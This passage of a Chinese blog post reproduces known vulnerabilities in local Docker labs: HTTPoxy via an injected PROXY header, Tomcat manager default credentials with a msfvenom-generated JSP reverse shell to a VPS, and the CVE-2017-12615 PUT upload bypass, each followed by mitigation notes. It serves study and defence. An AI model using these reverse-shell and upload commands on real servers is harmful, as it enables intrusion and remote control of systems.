<figcaption aria-hidden="true">blacsheep</figcaption>
</figure>
<h3 id="分析-3">分析</h3>
<p>以“(){”开头定义的环境变量在命令ENV中解析成函数后，Bash执行并未退出，而是继续解析并执行shell命令。核心的原因在于在输入的过滤中没有严格限制边界，没有做合法化的参数判断
补丁中已经修复 <img src="/images/2018/07/vul-15.jpg"
alt="blacsheep" /></p>
<h2 id="httpoxy漏洞cve-2016-5385">HTTPoxy漏洞(CVE-2016-5385)</h2>
<h3 id="原理-4">原理</h3>
<p>参考<a target="_blank" rel="noopener" href="http://www.laruence.com/2016/07/19/3101.html"
title="http://www.laruence.com/2016/07/19/3101.html">http://www.laruence.com/2016/07/19/3101.html</a>
漏洞原因简而言之就是cgi(fastcgi)要将用户传入的所有http头都加上<code>HTTP_</code>的前缀注册环境变量,而有些库会用到环境变量里面的<code>HTTP_PROXY</code>来作为http的代理,那么就会导致恶意用户提交恶意头部来窃取数据包中的敏感信息.
PHP5.6.24修复了此漏洞,所以本次采用PHP5.6.23</p>
<h3 id="搭环境-4">搭环境</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">docker-compose build</span><br><span class="line">docker-compose up -d</span><br></pre></td></tr></table></figure>
<p>然后访问<code>http://your_ip/index.php</code>就可以看到origin的服务器ip</p>
<h3 id="攻击-4">攻击</h3>
<p>我们在头部加上PROXY部分</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>192.168.0.104</span><br><span class="line"><span class="attribute">Cache-Control</span><span class="punctuation">: </span>max-age=0</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9,en;q=0.8</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>close</span><br><span class="line"><span class="attribute">PROXY</span><span class="punctuation">: </span>http://xx.xx.xx.xx:xx</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>然后vps上面转发的时候收到包 <img src="/images/2018/07/vul-16.jpg"
alt="blacsheep" /></p>
<h3 id="分析-4">分析</h3>
<p>简而言之就是php某些库进行网络访问的时候会用到名为<code>HTTP_PROXY</code>的环境变量作为代理,而这个变量在cgi中可控,从而导致一些问题.
避免方式:
如果是nginx的话可以加上<code>fastcgi_param HTTP_PROXY "";</code>
如果是库的作者那么请不要相信<code>HTTP_PROXY</code>的环境变量</p>
<h2 id="tomcat7弱口令后台getshell">tomcat7弱口令后台getshell</h2>
<h3 id="原理-5">原理</h3>
<p>tomcat如果登录到后台且没有关闭manage功能,那么就可以通过部署war文件来getshell
tomcat的后台功能</p>
<ul>
<li>manager（后台管理）
<ul>
<li>manager-gui 拥有html页面权限</li>
<li>manager-status 拥有查看status的权限</li>
<li>manager-script 拥有text接口的权限，和status权限</li>
<li>manager-jmx 拥有jmx权限，和status权限</li>
</ul></li>
<li>host-manager（虚拟主机管理）
<ul>
<li>admin-gui 拥有html页面权限</li>
<li>admin-script 拥有text接口权限</li>
</ul></li>
</ul>
<h3 id="搭环境-5">搭环境</h3>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker-compose up -d</span><br></pre></td></tr></table></figure>
<h3 id="攻击-5">攻击</h3>
<p>首先进入页面,登录后台</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">帐号密码都是tomcat</span><br></pre></td></tr></table></figure>
<p><img src="/images/2018/07/2018-09-03-17-34-39屏幕截图.png"
alt="blacsheep" /> 然后deploy一个war文件 <img
src="/images/2018/07/2018-09-03-17-36-19屏幕截图.png" alt="blacsheep" />
其中war文件可以用msfvenom生成</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p java/jsp_shell_reverse_tcp LHOST=your_vps_ip LPORT=your_vps_port -f raw&gt;shell.jsp</span><br></pre></td></tr></table></figure>
<p>然后就生成了jsp的木马 然后zip打包成war</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">zip -q -o shell.war shell.jsp</span><br></pre></td></tr></table></figure>
<p>然后去部署一下war文件,访问一下页面就可以反弹shell到你的vps上了 <img
src="/images/2018/07/2018-09-03-17-41-50屏幕截图.png"
alt="blacsheep" /></p>
<h3 id="分析-5">分析</h3>
<p>漏洞是由于tomcat后台的弱口令以及部署功能所导致的,解决方法可以是使用较强的密码,且manage页面本来是只允许本地访问,由于人为的修改所以可以被其他人访问
注意口令强度以及不要随意修改配置文件就好</p>
<h2
id="cve-2017-12615tomcat用put写shell">CVE-2017-12615(tomcat用PUT写shell)</h2>
<h3 id="原理-6">原理</h3>
<p>tomcat的配置文件中的readonly被设置为了false导致可以写入文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;servlet&gt;</span><br><span class="line">    &lt;servlet-name&gt;default&lt;/servlet-name&gt;</span><br><span class="line">    &lt;servlet-class&gt;org.apache.catalina.servlets.DefaultServlet&lt;/servlet-class&gt;</span><br><span class="line">    &lt;init-param&gt;</span><br><span class="line">        &lt;param-name&gt;debug&lt;/param-name&gt;</span><br><span class="line">        &lt;param-value&gt;0&lt;/param-value&gt;</span><br><span class="line">    &lt;/init-param&gt;</span><br><span class="line">    &lt;init-param&gt;</span><br><span class="line">        &lt;param-name&gt;listings&lt;/param-name&gt;</span><br><span class="line">        &lt;param-value&gt;false&lt;/param-value&gt;</span><br><span class="line">    &lt;/init-param&gt;</span><br><span class="line">    &lt;init-param&gt;</span><br><span class="line">        &lt;param-name&gt;readonly&lt;/param-name&gt;</span><br><span class="line">        &lt;param-value&gt;false&lt;/param-value&gt;</span><br><span class="line">    &lt;/init-param&gt;</span><br><span class="line">    &lt;load-on-startup&gt;1&lt;/load-on-startup&gt;</span><br><span class="line">&lt;/servlet&gt;</span><br></pre></td></tr></table></figure>
<h3 id="搭环境-6">搭环境</h3>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">docker-compose build</span><br><span class="line">docker-compose up -d</span><br></pre></td></tr></table></figure>
<h3 id="攻击-6">攻击</h3>
<p>用curl来put一个文件上去 <img
src="/images/2018/07/2018-09-04-09-43-43屏幕截图.png" alt="blacsheep" />
然后put一个jsp文件上去</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -X PUT -d @jsp.jsp &quot;http://127.0.0.1:8080/321.jsp&quot;</span><br></pre></td></tr></table></figure>
<p>发现405了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">&lt;html lang=&quot;en&quot;&gt;</span><br><span class="line">    &lt;head&gt;</span><br><span class="line">        &lt;title&gt;</span><br><span class="line">            HTTP Status 405 – Method Not Allowed</span><br><span class="line">        &lt;/title&gt;</span><br><span class="line">        &lt;style type=&quot;text/css&quot;&gt;</span><br><span class="line">h1 &#123;font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;&#125; h2 &#123;font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;&#125; h3 &#123;font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;&#125; body &#123;font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;&#125; b &#123;font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;&#125; p &#123;font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;&#125; a &#123;color:black;&#125; a.name &#123;color:black;&#125; .line &#123;height:1px;background-color:#525D76;border:none;&#125;</span><br><span class="line">        &lt;/style&gt;</span><br><span class="line">    &lt;/head&gt;</span><br><span class="line">    &lt;body&gt;</span><br><span class="line">        &lt;h1&gt;</span><br><span class="line">            HTTP Status 405 – Method Not Allowed</span><br><span class="line">        &lt;/h1&gt;</span><br><span class="line">        &lt;hr class=&quot;line&quot;&gt;</span><br><span class="line">        &lt;p&gt;</span><br><span class="line">            &lt;b&gt;Type&lt;/b&gt; Status Report</span><br><span class="line">        &lt;/p&gt;</span><br><span class="line">        &lt;p&gt;</span><br><span class="line">            &lt;b&gt;Message&lt;/b&gt; JSPs only permit GET POST or HEAD</span><br><span class="line">        &lt;/p&gt;</span><br><span class="line">        &lt;p&gt;</span><br><span class="line">            &lt;b&gt;Description&lt;/b&gt; The method received in the request-line is known by the origin server but not supported by the target resource.</span><br><span class="line">        &lt;/p&gt;</span><br><span class="line">        &lt;hr class=&quot;line&quot;&gt;</span><br><span class="line">        &lt;h3&gt;</span><br><span class="line">            Apache Tomcat/8.5.19</span><br><span class="line">        &lt;/h3&gt;⏎</span><br><span class="line">    &lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>尝试文件名绕过</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -X PUT -d @jsp.jsp &quot;http://127.0.0.1:8080/321.jsp/&quot;</span><br></pre></td></tr></table></figure>
<p>然后拿到shell <img
src="/images/2018/07/2018-09-04-10-43-47屏幕截图.png"
alt="blacsheep" /></p>
<h3 id="分析-6">分析</h3>
<p>链接:<a
target="_blank" rel="noopener" href="http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html"
title="http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html">http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/categories/">Category</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#wordpress-phpmailed-rce"><span class="toc-number">1.</span> <span class="toc-text">wordpress-phpmailed-rce</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E7%8E%AF%E5%A2%83"><span class="toc-number">1.2.</span> <span class="toc-text">搭环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB"><span class="toc-number">1.3.</span> <span class="toc-text">攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90"><span class="toc-number">1.4.</span> <span class="toc-text">分析</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%86%E6%9E%90patternselect"><span class="toc-number">1.4.1.</span> <span class="toc-text">分析patternselect</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%86%E6%9E%90%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F"><span class="toc-number">1.4.2.</span> <span class="toc-text">分析正则表达式</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#activemq%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5%E6%BC%8F%E6%B4%9Ecve-2016-3088"><span class="toc-number">2.</span> <span class="toc-text">ActiveMQ任意文件写入漏洞(CVE-2016-3088)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-1"><span class="toc-number">2.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E7%8E%AF%E5%A2%83-1"><span class="toc-number">2.2.</span> <span class="toc-text">搭环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB-1"><span class="toc-number">2.3.</span> <span class="toc-text">攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%99webshell"><span class="toc-number">2.3.1.</span> <span class="toc-text">写webshell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%99%E5%85%A5crontab%E8%87%AA%E5%8A%A8%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">2.3.2.</span> <span class="toc-text">写入crontab,自动反弹shell</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90-1"><span class="toc-number">2.4.</span> <span class="toc-text">分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#aria2-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5%E6%BC%8F%E6%B4%9E"><span class="toc-number">3.</span> <span class="toc-text">Aria2 任意文件写入漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-2"><span class="toc-number">3.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E7%8E%AF%E5%A2%83-2"><span class="toc-number">3.2.</span> <span class="toc-text">搭环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB-2"><span class="toc-number">3.3.</span> <span class="toc-text">攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90-2"><span class="toc-number">3.4.</span> <span class="toc-text">分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#shell%E7%A0%B4%E5%A3%B3%E6%BC%8F%E6%B4%9Ecve-2014-6271"><span class="toc-number">4.</span> <span class="toc-text">Shell破壳漏洞(CVE-2014-6271)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-3"><span class="toc-number">4.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E7%8E%AF%E5%A2%83-3"><span class="toc-number">4.2.</span> <span class="toc-text">搭环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB-3"><span class="toc-number">4.3.</span> <span class="toc-text">攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E6%B5%8B%E8%AF%95"><span class="toc-number">4.3.1.</span> <span class="toc-text">本地测试</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%BF%9C%E7%A8%8B%E5%88%A9%E7%94%A8"><span class="toc-number">4.3.2.</span> <span class="toc-text">远程利用</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90-3"><span class="toc-number">4.4.</span> <span class="toc-text">分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#httpoxy%E6%BC%8F%E6%B4%9Ecve-2016-5385"><span class="toc-number">5.</span> <span class="toc-text">HTTPoxy漏洞(CVE-2016-5385)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-4"><span class="toc-number">5.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E7%8E%AF%E5%A2%83-4"><span class="toc-number">5.2.</span> <span class="toc-text">搭环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB-4"><span class="toc-number">5.3.</span> <span class="toc-text">攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90-4"><span class="toc-number">5.4.</span> <span class="toc-text">分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#tomcat7%E5%BC%B1%E5%8F%A3%E4%BB%A4%E5%90%8E%E5%8F%B0getshell"><span class="toc-number">6.</span> <span class="toc-text">tomcat7弱口令后台getshell</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-5"><span class="toc-number">6.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E7%8E%AF%E5%A2%83-5"><span class="toc-number">6.2.</span> <span class="toc-text">搭环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB-5"><span class="toc-number">6.3.</span> <span class="toc-text">攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90-5"><span class="toc-number">6.4.</span> <span class="toc-text">分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#cve-2017-12615tomcat%E7%94%A8put%E5%86%99shell"><span class="toc-number">7.</span> <span class="toc-text">CVE-2017-12615(tomcat用PUT写shell)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-6"><span class="toc-number">7.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E7%8E%AF%E5%A2%83-6"><span class="toc-number">7.2.</span> <span class="toc-text">搭环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB-6"><span class="toc-number">7.3.</span> <span class="toc-text">攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90-6"><span class="toc-number">7.4.</span> <span class="toc-text">分析</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&text=vulhub复现(大概持续更新)"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&title=vulhub复现(大概持续更新)"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&is_video=false&description=vulhub复现(大概持续更新)"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=vulhub复现(大概持续更新)&body=Check out this article: http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&title=vulhub复现(大概持续更新)"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&title=vulhub复现(大概持续更新)"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&title=vulhub复现(大概持续更新)"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&title=vulhub复现(大概持续更新)"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&name=vulhub复现(大概持续更新)&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&t=vulhub复现(大概持续更新)"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2026
    blacsheep
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
